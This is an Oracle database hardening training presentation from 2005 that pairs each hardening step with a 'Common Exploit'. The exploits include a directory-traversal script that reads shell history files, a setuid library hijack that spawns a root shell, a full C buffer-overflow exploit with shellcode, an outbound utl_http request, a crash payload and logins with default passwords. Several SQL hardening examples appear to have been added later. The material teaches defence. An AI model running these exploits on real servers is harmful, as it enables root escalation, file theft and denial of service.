Alexander Kornbrust, 26-Sep-2005, V1.00, Red-Database-Security GmbH

IT Summerschool RWTH Aachen
Oracle Database Basic Hardening & Common Exploits
Alexander Kornbrust, 26-September-2005
Table of content
• Apply latest security patches
• X11 security
• Cleartext passwords
• File permission & settings
• Listener security
• External users
• Default passwords
• Mighty packages
• Password Verify Function
• Oracle profile
• System tablespace
• Init.ora settings
Apply latest security patches
• 8.1.7.4
• 9.1.0.5
• 9.2.0.6
• 9.2.0.7
• 10.1.0.2
• 10.1.0.3
• 10.1.0.4
• 10.2.0.1
• Common exploits are available on the internet.
Apply latest security patches on top of the latest patchsets
X11 Security
The Oracle documentation (until 10.2) recommends running the xhost + command before you start the installation.
Never use xhost +, because it opens the X server to everyone.
Solution
• Make use of any access control mechanisms provided by the operating system and window system to prevent theft of workstation display contents or keystrokes
• Inform users to not use the 'xhost +' command and/or disable it
• Check xsession files for 'xhost +' and remove it
• Disable broadcast and/or indirect XDM requests for any X terminals that you don't explicitly want to support
References for X11 Security
• Crash Course in X Windows Security ( http://www.hack.gr/users/atlantis/windows.html )
• Safely Using the X Window System and "Securing X Windows" by John Fisher of CIAC
Common Exploits for X11
• Read keyboard (see DVD: xkey.c)
• Dump X11 windows
Cleartext Passwords

Unix history files (.bash_history/.sh_history) often contain command lines with cleartext passwords (e.g. sqlplus system/secretpw).

Solution
Edit the history files on a regular basis and remove the passwords.
Common Exploit
Read Unix history files via utl_file or dbms_lob and directory traversal:

    DECLARE
        Lob_loc   BFILE;
        Buffer    RAW(1024);
        Amount    BINARY_INTEGER := 1024;
        Position  INTEGER := 1;
    BEGIN
        -- MEDIA_DIR is an existing directory object; the relative path climbs out of it
        Lob_loc := BFILENAME('MEDIA_DIR', '../../../.sh_history');
        DBMS_LOB.OPEN(Lob_loc, DBMS_LOB.LOB_READONLY);
        LOOP
            DBMS_LOB.READ(Lob_loc, Amount, Position, Buffer);
            dbms_output.put_line(utl_raw.cast_to_varchar2(Buffer));
            Position := Position + Amount;
        END LOOP;
    EXCEPTION
        WHEN NO_DATA_FOUND THEN   -- end of file reached
            DBMS_LOB.CLOSE(Lob_loc);
    END;
    /
Cleartext Passwords in environment

Remove cleartext passwords from the environment. If an attacker compromises a system, he gets the passwords easily (set command).

Solution
Rewrite your scripts and never use plaintext passwords in the environment.
Common Exploit
http://server/fcgi-bin/echo.exe
Common Exploit
Run an operating system command (e.g. env or set) from SQL*Plus via extproc or Java
Executables with s-bits
Remove s-bits from Oracle files, e.g. dbsnmp

Solution
1. Search files with s-bits
    find . -type f -perm -4000 -print
2. Remove the s-bit
    chmod -s dbsnmp
Common Exploit (become root)
    [ora9i]$ ldd ./bin/dbsnmp
        libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
        libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
        libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
        libthread.so.1 => /usr/lib/libthread.so.1
        libkstat.so.1 => /usr/lib/libkstat.so.1
        ...

Create a new library that is used by dbsnmp:

    /* header names were lost in extraction; these are the ones the calls below need */
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    _init() { printf("PID=%i EUID=%i",getpid(),getuid());setuid(0);system("/usr/bin/ksh");}
Execution Permission

Remove the execute permission for all other users from the Oracle executables. The oracle executable has an s-bit, and some versions are vulnerable to a buffer overflow (exploit available via the internet).

Solution
    chmod o-x oracle
Common Exploit 1:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #define VER "Operation_Oracle_Owner_Ownage_Overflow_Oday Version 1.0.1"
    #define PADDING 0x90
    #define RIMSHOT 9850
    //#define BUFF 15000

    char oracle_crusher_char[] = "\x31\xc0\xb0\x01\xcd\x80";

    unsigned long retrieve_offset()
    {
        __asm__("movl %esp, %eax");
    }

    int main(int argc, char *argv[])
    {
        char Bucket[RIMSHOT];
        long badd_addr;
        short delta = 0;
        short i;

        if(argc > 1) {
            delta = atol(argv[1]);
        }
        badd_addr = retrieve_offset() - delta;

        printf("\n\n*************************************************************\n"
               "*************************************************************\n");
        printf("[-] %s\n", VER);
        printf("[-] Bug discovered and PoC developed by c0ntexhushmail.com.\n"
               "[-] --------------------------------------------------------\n"
               "[-] Fresh 0day PoC oracle && oracleO buffer overflow exploit\n"
               "[-] Offset values from 1750 - 3500 should work perfectly, k.\n"
               "[-] Run it and ltrace -o outout ./oracle_owned for goodness.\n"
               "[-] --------------------------------------------------------\n"
               "[-] gcc -Wall -o oracle_owned oracle_owned.c\n"
               "[-] --------------------------------------------------------\n"
               "[-] Usage: %s offset_value\n", argv[0]);

        for(i = 0; i < RIMSHOT; i += 4)
            *(long *) &Bucket[i] = badd_addr;
        for(i = 0; i < (RIMSHOT - strlen(oracle_crusher_char) - 100); i++)
            *(Bucket + i) = PADDING;
        memcpy(Bucket + i, oracle_crusher_char, strlen(oracle_crusher_char));

        printf("[-] Using Return address 0x%lx\n", badd_addr);
        printf("[-] Using offset value %d\n", delta);
        printf("*************************************************************\n"
               "*************************************************************\n\n");

        execlp("/database/u00/app/oracle/product/9.2.0.1.0/bin/oracle", "oracle", Bucket, NULL);
        return 0;
    }
Remove old versions
Remove old, vulnerable executables/libraries
• dbsnmp0
• oracle0

Solution
    rm dbsnmp0
Check file permission

Check file and directory permissions on a regular basis.

Oracle recommends setting umask=022. The result of this setting is a world-readable export file.
Very often these (full) export files contain the entire database.

    drwxr-xr-x  2 oracle dba         512 Apr 23 09:00 .
    drwxr-xr-x  4 oracle dba         512 Apr 18  2004 ..
    -rw-r--r--  1 oracle dba 22439264450 Aug 23 05:24 full_export.dmp
Common Exploit
Copy dump-files from the Oracle-Home directory
    #johndoe> cp /home/oracle/dump/full_export.dmp ~/.
Remove unneeded sources

Remove sources and application code from the database server so that they cannot serve as hints to anyone who reads them.
Securing TNS Listener
• Set Listener Password (up to 9i Rel.2)
• Set ADMIN_RESTRICTIONS
• Remove unneeded Services
Common Exploits
• Stop the listener via lsnrctl stop
• Change the listener.log name to .rhosts and send a specially crafted TNS packet
For details, see the presentation "Listener Security"
External (OPS$) user
For historical reasons Oracle still supports external users. These database users are authenticated by the operating system.
Anyone with access to an external O/S account (e.g. boot Linux from a boot-CD) can access the database without further authentication.
To use this, the init.ora parameter REMOTE_OS_AUTHENT must be TRUE.
If REMOTE_OS_AUTHENT is FALSE, external authentication is only used for trusted connections like ASO (Radius), Windows, …
Common Exploit
Create different OS accounts like oracle, admin, administrator … and log in from this operating system account.
Remove Default Passwords
• outln/outln
• dbsnmp/dbsnmp
• system/manager
• sys/change_on_install
• scott/tiger

Solution - change database passwords:
    alter user outln identified by my!top112123;
The password is transferred in plaintext over the network.

Better solution in SQL*Plus:
    SQL> password outln
Or use Oracle Advanced Security (ASO)
Common Exploit 1
Connect with default password and escalate privileges
    sqlplus scott/tiger@db
    sqlplus system/manager@db
    sqlplus sys/change_on_install@db
    sqlplus outln/outln@db
Common Exploit 2
Sniff passwords via the trace file functionality (sqlnet.ora on the server):

    TRACE_FILE_SERVER=training.trc
    TRACE_DIRECTORY_SERVER=c:\temp
    TRACE_LEVEL_SERVER=SUPPORT

    SQL> alter user scott identified by tiger;
    User altered.

    [24-JUN-2005 13:11:20:527] nsprecv: 74 65 72 20 75 73 65 72 |ter.user|
    [24-JUN-2005 13:11:20:527] nsprecv: 20 73 63 6F 74 74 20 69 |.scott.i|
    [24-JUN-2005 13:11:20:527] nsprecv: 64 65 6E 74 69 66 69 65 |dentifie|
    [24-JUN-2005 13:11:20:527] nsprecv: 64 20 62 79 20 74 69 67 |d.by.tig|
    [24-JUN-2005 13:11:20:527] nsprecv: 65 72 01 00 00 00 01 00 |er......|
Common Exploit 2
Sniff passwords with ethereal
Sanitize Connect and Resource Role

Sanitize the default Oracle roles CONNECT and RESOURCE (up to 10.1.x)

Connect:
• ALTER SESSION
• CREATE CLUSTER
• CREATE DATABASE LINK
• CREATE SEQUENCE
• CREATE SESSION
• CREATE SYNONYM
• CREATE TABLE
• CREATE VIEW

Resource:
• CREATE CLUSTER
• CREATE INDEXTYPE
• CREATE OPERATOR
• CREATE PROCEDURE
• CREATE SEQUENCE
• CREATE TABLE
• CREATE TRIGGER
• CREATE TYPE
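Checking and trimming the two default roles from SQL*Plus as SYS, as an added example (not part of the original slides). The privilege lists are the ones shown above; the user name app_user is an assumed placeholder.

```sql
-- Added example: what CONNECT and RESOURCE still hand out on this instance.
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE grantee IN ('CONNECT', 'RESOURCE')
 ORDER BY grantee, privilege;

-- Who holds the roles (these accounts lose the privileges revoked below).
SELECT grantee, granted_role
  FROM dba_role_privs
 WHERE granted_role IN ('CONNECT', 'RESOURCE')
 ORDER BY granted_role, grantee;

-- Reduce CONNECT to plain login (what Oracle itself did in 10.2):
-- everything except CREATE SESSION goes.
REVOKE ALTER SESSION, CREATE CLUSTER, CREATE DATABASE LINK,
       CREATE SEQUENCE, CREATE SYNONYM, CREATE TABLE, CREATE VIEW
  FROM CONNECT;

-- RESOURCE: keep only what application schemas need for ordinary objects
-- (tables, sequences, procedures); the rest is rarely used and goes.
REVOKE CREATE CLUSTER, CREATE INDEXTYPE, CREATE OPERATOR,
       CREATE TRIGGER, CREATE TYPE
  FROM RESOURCE;

-- Granting RESOURCE directly to a user also grants UNLIMITED TABLESPACE
-- as a separate system privilege (not part of the role); that is what lets
-- a user fill SYSTEM or any other tablespace. Find it and replace it by a quota.
SELECT grantee
  FROM dba_sys_privs
 WHERE privilege = 'UNLIMITED TABLESPACE'
   AND grantee NOT IN ('SYS', 'SYSTEM')
 ORDER BY grantee;

REVOKE UNLIMITED TABLESPACE FROM app_user;        -- app_user: assumed name
ALTER USER app_user QUOTA 100M ON users;          -- explicit quota instead
ALTER USER app_user QUOTA 0 ON system;            -- and nothing in SYSTEM
```

Regrant single privileges directly to the schemas that really need them after the revoke; application code that creates objects at runtime will otherwise fail.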
Common Exploit
Crash the database with a bug in the create database link:SQL> create database link crash using 'iasdb11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd11111111111';2 3*Error in line 1:ORA-03113: end-of-file on communication channel
Password Verify Function

Use a password verify function and assign this function to all profiles.

Solution
Modify and install the password verification function UTLPWDMG.sql and assign this function to the default profile.

    SQL> alter profile default limit password_verify_function verify_function;
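A verify function in the style of UTLPWDMG.sql, as an added example (not the script shipped by Oracle and not part of the original slides). It is run as SYS; the rejected default passwords are the ones listed on the "Remove Default Passwords" slide, and the checks avoid REGEXP functions so they work on 8i/9i as well as 10g.

```sql
-- Added example: custom password verify function, created in the SYS schema.
CREATE OR REPLACE FUNCTION verify_function (
    username     VARCHAR2,
    password     VARCHAR2,
    old_password VARCHAR2) RETURN BOOLEAN IS
    TYPE word_list IS TABLE OF VARCHAR2(30);
    -- well-known defaults from this presentation plus a few common choices
    weak     word_list := word_list('manager', 'change_on_install', 'tiger',
                                    'outln', 'dbsnmp', 'oracle', 'password',
                                    'welcome');
    lower_pw VARCHAR2(4000) := NLS_LOWER(password);
BEGIN
    -- 1. Not the user name, in any letter case.
    IF lower_pw = NLS_LOWER(username) THEN
        raise_application_error(-20001, 'Password must not be the username');
    END IF;
    -- 2. Minimum length.
    IF LENGTH(password) < 10 THEN
        raise_application_error(-20002, 'Password must be at least 10 characters');
    END IF;
    -- 3. Not one of the well-known defaults.
    FOR i IN 1 .. weak.COUNT LOOP
        IF lower_pw = weak(i) THEN
            raise_application_error(-20003, 'Password is a well-known default');
        END IF;
    END LOOP;
    -- 4. At least one digit and one letter. TRANSLATE strips the class; if the
    --    result still equals the input, the class was absent. An input made up
    --    only of that class translates to NULL, so the comparison is false
    --    and the check passes, which is the intended behaviour.
    IF TRANSLATE(lower_pw, 'x0123456789', 'x') = lower_pw THEN
        raise_application_error(-20004, 'Password needs at least one digit');
    END IF;
    IF TRANSLATE(lower_pw, 'xabcdefghijklmnopqrstuvwxyz', 'x') = lower_pw THEN
        raise_application_error(-20005, 'Password needs at least one letter');
    END IF;
    -- 5. Must differ from the previous one. old_password is NULL when a DBA
    --    resets the password, so only compare when it is known.
    IF old_password IS NOT NULL AND lower_pw = NLS_LOWER(old_password) THEN
        raise_application_error(-20006, 'Password must differ from the old one');
    END IF;
    RETURN TRUE;
END;
/

-- Attach it to the default profile; every ALTER USER ... IDENTIFIED BY now runs it.
ALTER PROFILE default LIMIT PASSWORD_VERIFY_FUNCTION verify_function;
```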
Enable Auditing for SYS and normal users
It is not possible to audit SYS in 8i and lower.
Solution
• audit session;
• audit create user;
• set audit_sys_operations (init.ora/pfile) to TRUE and restart the database
Remove Public Grants from mighty packages
• utl_http
• utl_smtp
• utl_tcp
• utl_file
• utl_inaddr
• dbms_lob
• dbms_export_extension
• dbms_sql

Also remove mighty packages reachable via database links
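How to find and remove the PUBLIC grants on the packages listed above without silently breaking the application, as an added example (not part of the original slides). The package list is the one on this slide; app_owner is an assumed schema name.

```sql
-- Added example: which of the listed packages PUBLIC can still execute.
SELECT table_name, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND grantee = 'PUBLIC'
   AND table_name IN ('UTL_HTTP', 'UTL_SMTP', 'UTL_TCP', 'UTL_FILE',
                      'UTL_INADDR', 'DBMS_LOB', 'DBMS_EXPORT_EXTENSION',
                      'DBMS_SQL')
 ORDER BY table_name;

-- Stored code that references them is invalidated by the revoke and its
-- owner needs an explicit grant afterwards. Check before revoking;
-- DBMS_SQL and DBMS_LOB in particular are used by many Oracle components.
SELECT DISTINCT owner, name, type, referenced_name
  FROM dba_dependencies
 WHERE referenced_owner = 'SYS'
   AND referenced_name IN ('UTL_HTTP', 'UTL_SMTP', 'UTL_TCP', 'UTL_FILE',
                           'UTL_INADDR', 'DBMS_LOB', 'DBMS_EXPORT_EXTENSION',
                           'DBMS_SQL')
   AND owner NOT IN ('SYS', 'SYSTEM')
 ORDER BY owner, name;

-- Take the packages away from everybody ...
REVOKE EXECUTE ON sys.utl_http              FROM PUBLIC;
REVOKE EXECUTE ON sys.utl_smtp              FROM PUBLIC;
REVOKE EXECUTE ON sys.utl_tcp               FROM PUBLIC;
REVOKE EXECUTE ON sys.utl_file              FROM PUBLIC;
REVOKE EXECUTE ON sys.utl_inaddr            FROM PUBLIC;
REVOKE EXECUTE ON sys.dbms_lob              FROM PUBLIC;
REVOKE EXECUTE ON sys.dbms_export_extension FROM PUBLIC;
REVOKE EXECUTE ON sys.dbms_sql              FROM PUBLIC;

-- ... and give them back only to the schemas found in the dependency query.
GRANT EXECUTE ON sys.utl_http TO app_owner;   -- app_owner: assumed name

-- Database links: a remote caller runs with the rights of the link's user,
-- so every link account needs the same review as a local user.
SELECT owner, db_link, username, host
  FROM dba_db_links
 ORDER BY owner, db_link;
```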
Common Exploit 1
Many versions of Oracle utl_file and dbms_lob are vulnerable to directory traversal. Everybody with an Oracle account can read every file on the database server:

    DECLARE
        Lob_loc   BFILE;
        Buffer    RAW(1024);
        Amount    BINARY_INTEGER := 1024;
        Position  INTEGER := 1;
    BEGIN
        Lob_loc := BFILENAME('MEDIA_DIR', 'myfile.txt');
        DBMS_LOB.OPEN(Lob_loc, DBMS_LOB.LOB_READONLY);
        LOOP
            DBMS_LOB.READ(Lob_loc, Amount, Position, Buffer);
            dbms_output.put_line(utl_raw.cast_to_varchar2(Buffer));
            Position := Position + Amount;
        END LOOP;
    EXCEPTION
        WHEN NO_DATA_FOUND THEN   -- end of file reached
            DBMS_LOB.CLOSE(Lob_loc);
    END;
    /
Common Exploit 2
Send information to an external website:

    SET serveroutput ON SIZE 40000
    DECLARE
        req   utl_http.req;
        resp  utl_http.resp;
        value VARCHAR2(1024);
    BEGIN
        utl_http.set_proxy('172.20.96.10:8080');
        req := utl_http.begin_request('http://www.heise.de');
        utl_http.set_header(req, 'User-Agent', 'Mozilla/4.0');
        resp := utl_http.get_response(req);
        LOOP
            utl_http.read_line(resp, value, TRUE);
            dbms_output.put_line(value);
        END LOOP;
        utl_http.end_response(resp);
    EXCEPTION
        WHEN utl_http.end_of_body THEN
            utl_http.end_response(resp);
    END;
    /
Other options: Send information via DNS
Brute Force Attacks

Modify the profile for Oracle users to avoid brute force and denial of service attacks.

Solution

    SQL> ALTER PROFILE default LIMIT
           FAILED_LOGIN_ATTEMPTS 5
           PASSWORD_VERIFY_FUNCTION verify_function
           PASSWORD_LOCK_TIME 1/48
           PASSWORD_GRACE_TIME 10;
Common Exploits
• Brute force Oracle user accounts
• D.o.S. via concurrent users (to reach the limit "processes"). Create 300 (if processes=300) concurrent sessions.

    oracle@raclinux1:~> sqlplus scott/tiger
    SQL*Plus: Release 9.0.2.6 - Production
    Copyright (c) 1982, 2003, Oracle.  All rights reserved.

    ERROR:
    ORA-00020: maximum number of processes (%s) exceeded
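Queries a DBA can run to see both attacks from the previous two slides happening, plus the per-user session cap that blunts the session flood, as an added example (not part of the original slides). It assumes AUDIT SESSION from the auditing slide is switched on and audit_trail=DB, so DBA_AUDIT_SESSION is populated.

```sql
-- Added example: failed logins in the last 24 hours, per account and source.
-- returncode 1017 = invalid username/password (guessing),
--            28000 = account locked (FAILED_LOGIN_ATTEMPTS was reached).
SELECT username, os_username, userhost, returncode,
       COUNT(*)       AS attempts,
       MIN(timestamp) AS first_seen,
       MAX(timestamp) AS last_seen
  FROM dba_audit_session
 WHERE returncode IN (1017, 28000)
   AND timestamp > SYSDATE - 1
 GROUP BY username, os_username, userhost, returncode
HAVING COUNT(*) >= 5
 ORDER BY attempts DESC;

-- Accounts the profile has already locked, with the profile that did it.
SELECT username, account_status, lock_date, profile
  FROM dba_users
 WHERE account_status LIKE '%LOCKED%'
 ORDER BY lock_date DESC;

-- Current password/login limits of the default profile (should show the
-- FAILED_LOGIN_ATTEMPTS / PASSWORD_LOCK_TIME values set on the previous slide).
SELECT resource_name, limit
  FROM dba_profiles
 WHERE profile = 'DEFAULT'
   AND resource_type = 'PASSWORD';

-- The session-flood D.o.S.: how close the instance is to "processes".
SELECT resource_name, current_utilization, max_utilization, limit_value
  FROM v$resource_limit
 WHERE resource_name IN ('processes', 'sessions');

-- Who holds the sessions; one account with hundreds of them stands out.
SELECT username, machine, COUNT(*) AS sessions
  FROM v$session
 WHERE type = 'USER'
 GROUP BY username, machine
 ORDER BY sessions DESC;

-- Mitigation: cap sessions per user so one account cannot exhaust "processes".
-- Profile resource limits are only enforced when RESOURCE_LIMIT is TRUE.
ALTER SYSTEM SET resource_limit = TRUE SCOPE = BOTH;
ALTER PROFILE default LIMIT SESSIONS_PER_USER 10;
```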
SYSTEM tablespace

Check if the SYSTEM tablespace is used by users other than SYS/SYSTEM
Common Exploit
Fill the system tablespace with garbage
Init.ora settings

Check if O7_DICTIONARY_ACCESSIBILITY is set to FALSE
Solution: set O7_DICTIONARY_ACCESSIBILITY to FALSE

Check if SQL92_SECURITY is set to TRUE
Solution: set SQL92_SECURITY to TRUE
Common Exploit
Read any data dictionary table if the privilege "SELECT ANY TABLE" is granted.
Init.ora settings

Check that MAX_DUMP_FILE_SIZE is not set to UNLIMITED

Solution
• good partition/file system design (trace and dump files on a separate partition)
• set MAX_DUMP_FILE_SIZE in the init.ora
• alter session set max_dump_file_size=64M;
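One check for all the init.ora parameters this presentation touches (the two Init.ora slides, the external-user slide and the auditing slide), followed by the statements that set them, as an added example (not part of the original slides). It assumes an spfile (9i and later); with a plain init.ora the same values are edited into the file instead.

```sql
-- Added example: current values of the security-relevant parameters.
SELECT name, value, isdefault
  FROM v$parameter
 WHERE name IN ('o7_dictionary_accessibility', 'sql92_security',
                'remote_os_authent', 'audit_sys_operations',
                'max_dump_file_size', 'processes')
 ORDER BY name;

-- Target values after hardening:
--   o7_dictionary_accessibility = FALSE  SELECT ANY TABLE no longer covers SYS objects
--   sql92_security              = TRUE   UPDATE/DELETE with a WHERE clause need SELECT too
--   remote_os_authent           = FALSE  no OPS$ (OS-authenticated) logins from remote clients
--   audit_sys_operations        = TRUE   SYS activity is written to the OS audit trail
--   max_dump_file_size          = 64M    never UNLIMITED

-- Static parameters: written to the spfile, active after the next restart.
ALTER SYSTEM SET o7_dictionary_accessibility = FALSE SCOPE = SPFILE;
ALTER SYSTEM SET sql92_security              = TRUE  SCOPE = SPFILE;
ALTER SYSTEM SET remote_os_authent           = FALSE SCOPE = SPFILE;
ALTER SYSTEM SET audit_sys_operations        = TRUE  SCOPE = SPFILE;

-- Dynamic parameter: effective immediately and persisted for the restart.
ALTER SYSTEM SET max_dump_file_size = '64M' SCOPE = BOTH;

-- Directories the dump files land in; free space there is an O/S check,
-- this only tells you which file systems to watch (and to keep separate).
SELECT name, value
  FROM v$parameter
 WHERE name IN ('background_dump_dest', 'user_dump_dest', 'core_dump_dest');
```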
Common Exploit
An attacker could create a large dump file and fill the partition
Exercise
Contact

Alexander Kornbrust
Red-Database-Security GmbH
Bliesstrasse 16
D-66538 Neunkirchen
Germany

Phone: +49 (0)6821 - 95 17 637
Fax: +49 (0)6821 - 91 27 354
E-Mail: [email protected]